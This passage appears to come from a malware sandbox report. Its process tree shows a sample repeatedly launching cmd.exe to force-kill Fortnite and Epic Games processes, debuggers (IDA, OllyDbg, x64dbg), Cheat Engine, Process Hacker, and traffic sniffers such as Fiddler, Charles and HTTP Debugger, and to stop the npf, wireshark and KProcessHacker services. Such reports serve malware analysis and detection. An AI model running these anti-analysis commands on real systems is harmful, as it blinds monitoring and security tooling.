  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2740
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1744
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:5040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:2804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:5056
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:1576
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:836
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1908
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3164
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3956
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4136
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1260
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1980
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4908
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3752
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4396
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5104
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:236
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3780
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3992
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:380
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3660
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:692
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1436
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1148
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1404
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:5112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2244
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4328
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2088
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4944
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4972
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:5048
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:4304
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:828
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4376
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4064
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2416
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4788
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1408
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3248
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2328
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4936
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:3844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3632
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1256
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4916
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:4540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:756
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
